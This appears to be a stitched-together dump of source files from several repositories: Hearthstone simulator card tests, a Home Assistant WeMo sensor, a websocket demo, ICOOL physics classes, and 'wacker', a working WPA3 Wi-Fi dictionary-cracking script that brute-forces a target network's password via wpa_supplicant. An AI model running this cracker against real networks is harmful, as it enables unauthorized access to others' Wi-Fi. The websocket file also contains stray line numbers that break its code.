PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(26, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(23, game.players[1].hero.health)
self.assertFalse(game.players[0].minions[0].charge())
self.assertFalse(game.players[0].minions[1].charge())
self.assertTrue(game.players[0].minions[2].charge())
def test_AnimalCompanion(self):
game = generate_game_for(AnimalCompanion, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Leokk", game.players[0].minions[0].card.name)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual("Leokk", game.players[0].minions[0].card.name)
self.assertEqual("Misha", game.players[0].minions[1].card.name)
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(5, game.players[0].minions[1].calculate_attack())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual("Leokk", game.players[0].minions[0].card.name)
self.assertEqual("Misha", game.players[0].minions[1].card.name)
self.assertEqual("Huffer", game.players[0].minions[2].card.name)
def test_ScavengingHyena(self):
game = generate_game_for([ScavengingHyena, ScavengingHyena, Consecration], [StonetuskBoar, ShadowBolt],
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(2, game.players[0].minions[1].calculate_attack())
self.assertEqual(2, game.players[0].minions[0].health)
self.assertEqual(2, game.players[0].minions[1].health)
game.play_single_turn() # Kills 1 Hyena, other Hyena grows
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
def test_SnakeTrap(self):
game = generate_game_for([SnakeTrap, IronfurGrizzly], BluegillWarrior,
CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(1, len(game.players[0].secrets))
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(0, len(game.players[0].secrets))
def test_SnakeTrap_full_board(self):
game = generate_game_for([SnakeTrap, Onyxia], KingKrush, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 17):
game.play_single_turn()
self.assertEqual(7, len(game.current_player.minions))
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(0, len(game.other_player.minions))
game.play_single_turn() # Player 2 will play King Krush, which will charge a whelp
self.assertEqual(1, len(game.other_player.secrets)) # The snake trap will not be proced as the board is full
self.assertEqual(6, len(game.other_player.minions))
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(30, game.other_player.hero.health)
def test_Webspinner(self):
game = generate_game_for(Webspinner, MortalCoil, OneCardPlayingAgent, CardTestingAgent)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(4, len(game.other_player.hand))
self.assertEqual(MINION_TYPE.BEAST, game.other_player.hand[3].minion_type)
def test_CallPet(self):
game = generate_game_for([CallPet, CallPet, MoltenGiant, MoltenGiant, MoltenGiant, KingKrush, MoltenGiant,
MoltenGiant], MortalCoil, CardTestingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
# King Krush should cost 4 less (9 - 4 = 5)
self.assertEqual(5, len(game.players[0].hand))
self.assertEqual(5, game.players[0].hand[4].mana_cost())
for turn in range(0, 2):
game.play_single_turn()
# Molten Giant should not be affected since it's not a beast
self.assertEqual(20, game.players[0].hand[5].mana_cost())
def test_CobraShot(self):
game = generate_game_for(CobraShot, StonetuskBoar, CardTestingAgent, CardTestingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(7, len(game.players[1].minions))
game.play_single_turn()
self.assertEqual(27, game.players[1].hero.health)
self.assertEqual(6, len(game.players[1].minions))
def test_Glaivezooka(self):
game = generate_game_for([StonetuskBoar, Glaivezooka], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
game.play_single_turn()
self.assertEqual(2, game.players[0].weapon.base_attack)
self.assertEqual(2, game.players[0].weapon.durability)
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
def test_MetaltoothLeaper(self):
game = generate_game_for([MetaltoothLeaper, Wisp], SpiderTank, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(2, len(game.players[1].minions))
self.assertEqual(3, game.players[1].minions[1].calculate_attack())
self.assertEqual(3, game.players[1].minions[0].calculate_attack())
# The second leaper will buff the first, but won't be buffed by anything
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, game.players[0].minions[1].calculate_attack())
self.assertEqual(5, game.players[0].minions[2].calculate_attack())
def test_KingOfBeasts(self):
game = generate_game_for([StonetuskBoar, StonetuskBoar, StonetuskBoar, KingOfBeasts], StonetuskBoar,
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(9):
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(5, game.current_player.minions[0].calculate_attack())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(5, len(game.current_player.minions))
self.assertEqual(5, game.current_player.minions[1].calculate_attack())
def test_Gahzrilla(self):
game = generate_game_for([Gahzrilla, ShatteredSunCleric, RaidLeader], ArcaneExplosion,
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(13):
game.play_single_turn()
self.assertEqual(6, game.current_player.minions[0].calculate_attack())
game.play_single_turn()
# Arcane explosion damages the Gahz'rilla, doubling its attack
self.assertEqual(12, game.other_player.minions[0].calculate_attack())
# The buff from the cleric is applies after the double, increases by 1
game.play_single_turn()
self.assertEqual(13, game.current_player.minions[1].calculate_attack())
# Should double exactly the current attack
game.play_single_turn()
self.assertEqual(26, game.other_player.minions[1].calculate_attack())
# Raid leader gives a +1 Bonus
game.play_single_turn()
self.assertEqual(27, game.current_player.minions[2].calculate_attack())
# The raid leader's aura is not included in the double, but is applied afterwards
# Tested by @jleclanche for patch 2.1.0.7785
game.play_single_turn()
self.assertEqual(53, game.other_player.minions[1].calculate_attack())
def testGahzrilla_temp_buff(self):
env = self
class TestAgent(CardTestingAgent):
def do_turn(self, player):
super().do_turn(player)
if turn == 14:
# Gahz'rilla's double comes after the buff from abusive, so total attack is
# (6 + 2) * 2 = 16
env.assertEqual(16, game.current_player.minions[0].calculate_attack())
game = generate_game_for([Gahzrilla, AbusiveSergeant, Hellfire], StonetuskBoar,
TestAgent, DoNothingAgent)
for turn in range(15):
game.play_single_turn()
# After the buff wears off, the double no longer includes it, so the total attack is
# 6 * 2 = 12
# Tested by @jleclanche for patch 2.1.0.7785
self.assertEqual(12, game.current_player.minions[0].calculate_attack())
def test_ogre_misdirection(self):
game = generate_game_for(OgreBrute, Misdirection, PlayAndAttackAgent, OneCardPlayingAgent)
random.seed(1850)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(26, game.players[0].hero.health)
self.assertEqual(30, game.players[1].hero.health)
def test_FeignDeath(self):
game = generate_game_for([HauntedCreeper, LootHoarder, Malorne, FeignDeath], StonetuskBoar,
OneCardPlayingAgent, DoNothingAgent)
for turn in range(14):
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual(7, len(game.other_player.hand))
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(8, len(game.current_player.hand))
def test_SteamwheedleSniper(self):
game = generate_game_for(SteamwheedleSniper, StonetuskBoar, PredictableAgent, DoNothingAgent)
for turn in range(9):
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(22, game.other_player.hero.health)
self.assertEqual(1, game.current_player.minions[1].health)
self.assertEqual(3, game.current_player.minions[0].health)
def test_Quickshot(self):
game = generate_game_for(QuickShot, Wisp, CardTestingAgent, CardTestingAgent)
for turn in range(2):
game.play_single_turn()
self.assertEqual(5, len(game.players[1].minions))
self.assertEqual(4, len(game.players[0].hand))
game.play_single_turn()
# We should have played a quick shot and not drawn a card
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(4, len(game.players[1].minions))
self.assertEqual(4, len(game.players[0].hand))
game.play_single_turn()
game.play_single_turn()
# We should have played a quick shot and not drawn a card
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(4, len(game.players[1].minions))
self.assertEqual(4, len(game.players[0].hand))
game.play_single_turn()
game.play_single_turn()
# We should have played two shots and not drawn a card
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(3, len(game.players[1].minions))
self.assertEqual(3, len(game.players[0].hand))
game.play_single_turn()
game.play_single_turn()
# We should have played two shots and not drawn a card
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(2, len(game.players[1].minions))
self.assertEqual(2, len(game.players[0].hand))
game.play_single_turn()
game.play_single_turn()
# We should have played three shots and not drawn a card
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(1, len(game.players[0].hand))
game.play_single_turn()
game.play_single_turn()
# We should have played three shots, one of which was drawn, and have one card left over
self.assertEqual(24, game.players[1].hero.health)
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(1, len(game.players[0].hand))
def test_CoreRager(self):
game = generate_game_for([CoreRager, Deathwing], Wisp, OneCardPlayingAgent, DoNothingAgent)
for turn in range(18):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(4, game.players[0].minions[0].health)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions)) # Deathwing discards whole hand
self.assertEqual(12, game.players[0].minions[0].calculate_attack())
self.assertEqual(12, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions)) # Deathwing the sequel
self.assertEqual(12, game.players[0].minions[0].calculate_attack())
self.assertEqual(12, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions)) # Core Rager activates battlecry
self.assertEqual(7, game.players[0].minions[0].calculate_attack())
self.assertEqual(7, game.players[0].minions[0].health)
def test_Acidmaw(self):
game = generate_game_for([Acidmaw, ArcaneExplosion, InjuredBlademaster], OasisSnapjaw,
CardTestingAgent, OneCardPlayingAgent)
for turn in range(14):
game.play_single_turn()
# Three snapjaws
self.assertEqual(4, len(game.current_player.minions))
# One Acidmaw
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual("Acidmaw", game.other_player.minions[0].card.name)
game.play_single_turn()
# The snapjaws are dead from the arcane explosion
self.assertEqual(0, len(game.other_player.minions))
# The blademaster dies as well.
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Acidmaw", game.current_player.minions[0].card.name)
def test_BearTrap(self):
game = generate_game_for(BearTrap, StonetuskBoar, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(1, len(game.players[0].secrets))
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(0, len(game.players[0].secrets))
def test_BearTrap_full_board(self):
game = generate_game_for([BearTrap, Onyxia], KingKrush, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 17):
game.play_single_turn()
self.assertEqual(7, len(game.current_player.minions))
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(0, len(game.other_player.minions))
game.other_player.agent.choose_target = lambda x: game.players[0].hero
game.play_single_turn() # Player 2 will play <NAME>, which will charge the enemy hero's face
self.assertEqual(1, len(game.other_player.secrets)) # The bear trap will not be proced as the board is full
self.assertEqual(7, len(game.other_player.minions))
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(22, game.other_player.hero.health)
def test_Powershot(self):
game = generate_game_for(ManaWyrm, Powershot, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 5):
game.play_single_turn()
game.players[1].agent.choose_target = lambda targets: targets[len(targets) - 2]
self.assertEqual(3, len(game.players[0].minions))
game.play_single_turn()
# Powershot the middle Wyrm
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].health)
self.assertEqual(1, game.players[0].minions[1].health)
self.assertEqual(1, game.players[0].minions[2].health)
```
#### File: sdwle/testsSDW__copy/serialization_tests.py
```python
import json
from SDWLE.engine import Game
import testsSDW.copy_tests
class TestGameSerialization(testsSDW.copy_tests.TestGameCopying):
def setUp(self):
def _save_object(o):
return o.__to_json__()
def serialization_copy(old_game):
game_json = json.dumps(old_game, default=_save_object, indent=2)
d = json.loads(game_json)
game = Game.__from_json__(d, [player.agent for player in old_game.players])
game._has_turn_ended = old_game._has_turn_ended
return game
super().setUp()
self._old_copy = Game.copy
Game.copy = serialization_copy
def tearDown(self):
super().tearDown()
Game.copy = self._old_copy
class TestMinionSerialization(testsSDW.copy_tests.TestMinionCopying):
def setUp(self):
def _save_object(o):
return o.__to_json__()
def serialization_copy(old_game):
game_json = json.dumps(old_game, default=_save_object, indent=2)
d = json.loads(game_json)
game = Game.__from_json__(d, [player.agent for player in old_game.players])
game._has_turn_ended = old_game._has_turn_ended
return game
super().setUp()
self._old_copy = Game.copy
Game.copy = serialization_copy
def tearDown(self):
super().tearDown()
Game.copy = self._old_copy
``` |
{
"source": "jon102034050/home-assistant",
"score": 2
} |
#### File: components/wemo/binary_sensor.py
```python
import asyncio
import logging
from homeassistant.components.binary_sensor import BinarySensorEntity
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .const import DOMAIN as WEMO_DOMAIN
from .entity import WemoEntity
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up WeMo binary sensors."""
async def _discovered_wemo(coordinator):
"""Handle a discovered Wemo device."""
async_add_entities([WemoBinarySensor(coordinator)])
async_dispatcher_connect(hass, f"{WEMO_DOMAIN}.binary_sensor", _discovered_wemo)
await asyncio.gather(
*(
_discovered_wemo(coordinator)
for coordinator in hass.data[WEMO_DOMAIN]["pending"].pop("binary_sensor")
)
)
class WemoBinarySensor(WemoEntity, BinarySensorEntity):
"""Representation a WeMo binary sensor."""
@property
def is_on(self) -> bool:
"""Return true if the state is on. Standby is on."""
return self.wemo.get_state()
``` |
{
"source": "Jon104/Vision-CPU",
"score": 3
} |
#### File: Jon104/Vision-CPU/server.py
```python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Websocket demo, from iosoft.blog
import signal, sys, struct
from SimpleWebSocketServer import WebSocket, SimpleWebSocketServer
import numpy as np
from array import array
import json
import random
import time
PORTNUM = 8001
rList = [1, 2, 3, 4]
class Data:
def __init__(self, index):
self.index=index
def getData(self):
chata = [
-0.99,0,
-0.98,0,
-0.97,0,
-0.95,0.05,
-0.945,0.03,
-0.93,-0.7,
-0.926,-0.77,
-0.92,-0.8,
-0.914,-0.77,
-0.91,-0.7,
-0.89,0,
-0.87, 0.7,
-0.866,0.77,
-0.86,0.8,
-0.854,0.77,
-0.85,0.7,
-0.8275,0,
-0.81,-0.5,
-0.806,-0.57,
-0.80,-0.6,
-0.794,-0.57,
-0.79,-0.5,
-0.77,0,
-0.76,0.2,
-0.756,0.27,
-0.75,0.3,
-0.744,0.27,
-0.74,0.2,
-0.73,0,
-0.726,-0.07,
-0.72,-0.1,
-0.714,-0.07,
-0.71,0,
-0.705,0.02,
-0.7,0,
-0.06,0,
-0.05,-0.02,
-0.04,0.13,
-0.03,-0.27,
-0.02,0.27,
-0.01,-0.13,
0.0,0.02,
0.01,0,
0.06,0,
0.07,0.05,
0.08,-0.2,
0.09,0.4,
0.1,-0.4,
0.11,0.15,
0.12,-0.05,
0.13,0,
0.5,0,
0.73,0,
0.75,0,
0.749,0,
0.741,0,
0.74,0.5,
0.749,0.8,
0.9,0,
1.0,0
];
if (self.index % 2 == 1):
chata.append(0.4)
else:
chata.append(0.8)
chata.append(1.0)
self.index = self.index + 1
return chata
index = 1
# Websocket class to echo received data
class Echo(WebSocket):
def handleMessage(self):
for x in range(1):
global index
data=Data(index)
yop = json.dumps({"header": "ascan", "a": data.getData()})
self.sendMessage(yop.encode())
index = index + 1
def handleConnected(self):
print("Connected")
def handleClose(self):
print("Disconnected")
# Handle ctrl-C: close server
def close_server(signal, frame):
server.close()
sys.exit()
if __name__ == "__main__":
print("Websocket server on port %s" % PORTNUM)
server = SimpleWebSocketServer('0.0.0.0', PORTNUM, Echo)
print(server)
signal.signal(signal.SIGINT, close_server)
server.serveforever()
``` |
{
"source": "jon1scr/wacker",
"score": 2
} |
#### File: jon1scr/wacker/wacker.py
```python
import argparse
import logging
import os
import re
import signal
import socket
import stat
import subprocess
import sys
import time
def kill(sig, frame):
try:
wacker.kill()
except:
pass
sys.exit(0)
signal.signal(signal.SIGINT, kill)
class Wacker(object):
RETRY = 0
SUCCESS = 1
FAILURE = 2
def __init__(self, args, start_word, start_time):
self.args = args
self.start_time = start_time
self.start_word = start_word
self.dir = f'/tmp/wpa_supplicant'
self.server = f'{self.dir}/{args.interface}'
self.conf = f'{self.server}.conf'
self.log = f'{self.server}.log'
self.wpa = './wpa_supplicant-2.8/wpa_supplicant/wpa_supplicant'
self.pid = f'{self.server}.pid'
self.me = f'{self.dir}/{args.interface}_client'
self.cmd = f'{self.wpa} -P {self.pid} -B -i {self.args.interface} -c {self.conf}'
if args.debug:
self.cmd += f' -d -t -f {self.log}'
self.cmd = self.cmd.split()
wpa_conf = 'ctrl_interface={}\n\nnetwork={{\n}}'.format(self.dir)
self.total_count = int(subprocess.check_output(f'wc -l {args.wordlist.name}', shell=True).split()[0].decode('utf-8'))
# Create supplicant dir and conf (first be destructive)
os.system(f'mkdir {self.dir} 2> /dev/null')
os.system(f'rm -f {self.dir}/{args.interface}*')
with open(self.conf, 'w') as f:
f.write(wpa_conf)
loglvl = logging.DEBUG if args.debug else logging.INFO
logging.basicConfig(level=loglvl, filename=f'{self.server}_wacker.log', filemode='w', format='%(message)s')
def create_uds_endpoints(self):
''' Create unix domain socket endpoints '''
try:
os.unlink(self.me)
except Exception:
if os.path.exists(self.me):
raise
# bring the interface up... won't connect otherwise
os.system(f'ifconfig {self.args.interface} up')
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
self.sock.bind(self.me)
logging.info(f'Connecting to {self.server}')
try:
self.sock.connect(self.server)
except Exception:
raise
def start_supplicant(self):
''' Spawn a wpa_supplicant instance '''
print(f'Starting wpa_supplicant...')
proc = subprocess.Popen(self.cmd)
time.sleep(2)
logging.info(f'Started wpa_supplicant')
# Double check it's running
mode = os.stat(self.server).st_mode
if not stat.S_ISSOCK(mode):
raise Exception(f'Missing {self.server}...Is wpa_supplicant running?')
def send_to_server(self, msg):
''' Send a message to the supplicant '''
logging.debug(f'sending {msg}')
self.sock.sendall(msg.encode())
d = self.sock.recv(1024).decode().rstrip('\n')
if d == "FAIL":
raise Exception(f'{msg} failed!')
return d
def one_time_setup(self):
''' One time setup needed for supplicant '''
self.send_to_server('ATTACH')
self.send_to_server(f'SET_NETWORK 0 ssid "{self.args.ssid}"')
self.send_to_server(f'SET_NETWORK 0 key_mgmt SAE')
self.send_to_server(f'SET_NETWORK 0 bssid {self.args.bssid}')
self.send_to_server(f'SET_NETWORK 0 scan_freq {self.args.freq}')
self.send_to_server(f'SET_NETWORK 0 freq_list {self.args.freq}')
self.send_to_server(f'SET_NETWORK 0 ieee80211w 1')
self.send_to_server(f'DISABLE_NETWORK 0')
logging.debug(f'--- created network block 0 ---')
def send_connection_attempt(self, psk):
''' Send a connection request to supplicant'''
logging.info(f'Trying key: {psk}')
self.send_to_server(f'SET_NETWORK 0 sae_password "{psk}"')
self.send_to_server(f'ENABLE_NETWORK 0')
def listen(self, count):
''' Listen for responses from supplicant '''
while True:
datagram = self.sock.recv(2048)
if not datagram:
logging.error('WTF!!!! datagram is null?!?!?! Exiting.')
return Wacker.RETRY
data = datagram.decode().rstrip('\n')
event = data.split()[0]
logging.debug(data)
lapse = time.time() - self.start_time
self.print_stats(count, lapse)
if event == "<3>CTRL-EVENT-BRUTE-FAILURE":
logging.info('BRUTE ATTEMPT FAIL')
self.send_to_server(f'DISABLE_NETWORK 0')
logging.debug('\n{0} {1} seconds, count={2} {0}\n'.format("-"*15, lapse, count))
return Wacker.FAILURE
elif event == "<3>CTRL-EVENT-BRUTE-SUCCESS":
logging.info('BRUTE ATTEMPT SUCCESS')
logging.debug('\n{0} {1} seconds, count={2} {0}\n'.format("-"*15, lapse, count))
return Wacker.SUCCESS
else:
# do something with <3>CTRL-EVENT-SSID-TEMP-DISABLED ?
pass
def print_stats(self, count, lapse):
''' Print some useful stats '''
avg = count / lapse
spot = self.start_word + count
est = (self.total_count - spot) / avg
percent = spot / self.total_count * 100
end = time.strftime('%d %b %Y %H:%M:%S', time.localtime(start_time + est))
print(f'{spot:8} / {self.total_count:<8} words ({percent:2.2f}%) : {avg:6.2f} words/sec : ' \
f'{lapse/3600:5.3f} hours lapsed : {est/3600:6.2f} hours to exhaust ({end})', end='\r')
def kill(self):
''' Kill the supplicant '''
print('\nStop time: {}'.format(time.strftime('%d %b %Y %H:%M:%S', time.localtime(time.time()))))
os.kill(int(open(self.pid).read()), signal.SIGKILL)
def check_bssid(mac):
if not re.match(r'^([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})$', mac):
raise argparse.ArgumentTypeError(f'{mac} is not a valid bssid')
return mac
def check_interface(interface):
if not os.path.isdir(f'/sys/class/net/{interface}/wireless/'):
raise argparse.ArgumentTypeError(f'{interface} is not a wireless adapter')
return interface
parser = argparse.ArgumentParser(description='A WPA3 dictionary cracker. Must run as root!')
parser.add_argument('--wordlist', type=argparse.FileType('r'), required=True, help='wordlist to use', dest='wordlist')
parser.add_argument('--interface', type=check_interface, dest='interface', required=True, help='interface to use')
parser.add_argument('--bssid', type=check_bssid, dest='bssid', required=True, help='bssid of the target')
parser.add_argument('--ssid', type=str, dest='ssid', required=True, help='the ssid of the WPA3 AP')
parser.add_argument('--freq', type=int, dest='freq', required=True, help='frequency of the ap')
parser.add_argument('--start', type=str, dest='start_word', help='word to start with in the wordlist')
parser.add_argument('--debug', action='store_true', help='increase logging output')
args = parser.parse_args()
if os.geteuid() != 0:
print('This script must be run as root!')
sys.exit(0)
# Find requested startword
offset=0
start_word = 0
if args.start_word:
print(f'Starting with word "{args.start_word}"')
for word in args.wordlist:
if word.rstrip('\n') == args.start_word:
args.wordlist.seek(offset, os.SEEK_SET)
break;
offset += len(word.encode('utf-8'))
start_word += 1
else:
print(f'Requested start word "{args.start_word}" not found!')
wacker.kill()
start_time = time.time()
print('Start time: {}'.format(time.strftime('%d %b %Y %H:%M:%S', time.localtime(start_time))))
wacker = Wacker(args, start_word, start_time)
wacker.start_supplicant()
wacker.create_uds_endpoints()
wacker.one_time_setup()
# Start the cracking
count = 1
for word in args.wordlist:
word = word.rstrip('\n')
wacker.send_connection_attempt(word)
result = wacker.listen(count)
if result == Wacker.SUCCESS:
print(f"\nFound the password: '{word}'")
break
#elif result == Wacker.RETRY:
# pass
count += 1
else:
print('\nFlag not found')
wacker.kill()
``` |
{
"source": "jon2180/gdzwfw-crawler",
"score": 3
} |
#### File: jon2180/gdzwfw-crawler/html_downloader.py
```python
import socket
import traceback
from http.client import HTTPResponse
from urllib import request, parse, error
from config import user_agent
def try_catch(cb):
def wrapped_func(*args, **kw):
try:
data = cb(*args, **kw)
return data
except error.ContentTooShortError as e:
# print(f'{args}: [ContentTooShort] download failed\n{e.reason}')
traceback.print_exc()
print('\n')
return cb(*args, **kw)
except error.HTTPError as e:
# print(f'{url}: [HttpError] download failed\n{e.reason}')
traceback.print_exc()
print('\n')
return cb(*args, **kw)
# return fetch_html(url)
except socket.timeout as e:
# print(f'{url}: [SocketTimeout] download failed\n')
traceback.print_exc()
print('\n')
return cb(*args, **kw)
# return fetch_html(url)
except error.URLError as e:
if isinstance(e.reason, socket.timeout):
# print('socket timed out - URL %s', url)
return cb(*args, **kw)
# return fetch_html(url)
else:
print('some other error happened')
# print(f'{url}: [URLError] download failed\n{e.reason}')
traceback.print_exc()
print('\n')
return cb(*args, **kw)
# return fetch_html(url)
except Exception as e:
# print(f'{url}: download failed\n')
traceback.print_exc()
print('\n')
return None
return wrapped_func
@try_catch
def fetch_html(url, timeout: 'float' = 60):
req = request.Request(url)
req.add_header("User-Agent", user_agent)
res = request.urlopen(req, timeout=timeout)
assert isinstance(res, HTTPResponse)
html_doc = res.read()
res.close()
return html_doc
def build_post_body(query) -> bytes:
post_body = parse.urlencode(query).encode('utf-8')
return post_body
@try_catch
def fetch_json(url: 'str', post_body: 'bytes', refer: 'str', content_type: 'str'):
req = request.Request(url, post_body)
req.add_header("User-Agent", ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
" Chrome/87.0.4280.88 Safari/537.36"))
req.add_header("Content-Type", content_type)
req.add_header("Referer", refer)
res = request.urlopen(req, timeout=60)
assert isinstance(res, HTTPResponse)
json_doc = res.read()
res.close()
return json_doc
``` |
{
"source": "jon2718/ipycool_2.0",
"score": 2
} |
#### File: jon2718/ipycool_2.0/beamtype.py
```python
from container import *
from distribution import *
from correlation import *
class BeamType(Container):
"""
A BeamType is a:
(1) PARTNUM (I) particle number
(2) BMTYPE (I) beam type {magnitude = mass code; sign = charge}
1: e
2: μ
3: π
4: K
5: p
6: d
7: He3
8: Li7
(3) FRACBT (R) fraction of beam of this type {0-1} The sum of all fracbt(i) should =1.0
(4) Distribution
(5) NBCORR # of beam correlations {0-10}
(6) From 0-10 enclosed Correlation objects as specified by NBCORR (5)
"""
allowed_enclosed_commands = ['Correlation']
command_params = {
'partnum': {
'desc': 'Particle number',
'doc': '',
'type': 'Integer',
'req': True,
'default': None},
'bmtype': {
'desc': 'beam type {magnitude = mass code; sign = charge}: 1: e, 2: μ, 3: π, 4: K, 5: p. '
'6: d, 7: He3, 8: Li7',
'doc': '',
'out_dict': {
'e': 1,
'mu': 2,
'pi': 3,
'k': 4,
'p': 5,
'd': 6,
'he3': 7,
'li7': 8},
'type': 'Integer',
'req': True,
'default': None},
'fractbt': {
'desc': 'Fraction of beam of this type {0-1} The sum of all fracbt(i) should =1.0',
'doc': '',
'type': 'Real',
'req': True,
'default': None},
'distribution': {
'desc': 'Beam distribution object',
'doc': '',
'type': 'Distribution',
'req': True,
'default': None},
'nbcorr': {
'desc': '# of beam correlations {0-10}',
'doc': '',
'type': 'Integer',
'req': True,
'default': 0,
'min': 0,
'max': 10}}
def __init__(self, **kwargs):
ICoolObject.check_command_params_init(self, BeamType.command_params, **kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
self.__icool_setattr__(name, value)
def __str__(self):
return 'BeamType: \n'
def __repr__(self):
return '[BeamType: ]'
def gen_for001(self, file):
file.write(str(self.partnum))
file.write(' ')
file.write(str(self.bmtype))
file.write(' ')
file.write(str(self.fractbt))
file.write('\n')
self.distribution.gen_for001(file)
file.write('\n')
file.write(str(self.nbcorr))
file.write('\n')
for c in self.enclosed_commands:
c.gen_for001(file)
```
#### File: jon2718/ipycool_2.0/drift.py
```python
from material import Material
from subregion import SubRegion
from sregion import SRegion
from icool_composite import ICoolComposite
from icoolobject import ICoolObject
from nofield import NoField
from repeat import Repeat
class Drift(SRegion):
"""
Drift region.
By default will generate a vacuum drift region with cylindrical geometry.
"""
begtag = ''
endtag = ''
num_params = 0
command_params = {
'slen': {'desc': 'SRegion length',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'zstep': {'desc': 'Z step',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'rhigh': {'desc': 'R high',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'outstep': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'rep_drift': {'desc': 'Wrapped output SRegion',
'doc': '',
'type': 'Repeat',
'req': False,
'pos': None}
}
def __init__(self, **kwargs):
if ICoolObject.check_command_params_init(self, Drift.command_params, **kwargs) is False:
sys.exit(0)
material = Material(geom='CBLOCK', mtag='VAC')
nf = NoField()
sr = SubRegion(material=material, rlow=0, rhigh=self.rhigh, irreg=1, field=nf)
sreg = SRegion(zstep=self.zstep, nrreg=1, slen=self.slen)
sreg.add_enclosed_command(sr)
self.rep_drift = Repeat.wrapped_sreg(outstep=self.outstep, sreg=sreg)
def __call__(self, **kwargs):
ICoolObject.__call__(self, kwargs)
def __setattr__(self, name, value):
self.__icool_setattr__(name, value, Drift.command_params)
def __str__(self):
return 'Drift'
def gen_for001(self, file):
self.rep_drift.gen_for001(file)
```
#### File: jon2718/ipycool_2.0/icoolnamelistcontainer.py
```python
from icoolnamelist import *
from container import *
class ICoolNameListContainer(ICoolNameList, Container):
def gen_for001(self, file):
ICoolNameList.gen_for001(self, file)
Container.gen_for001(self, file)
```
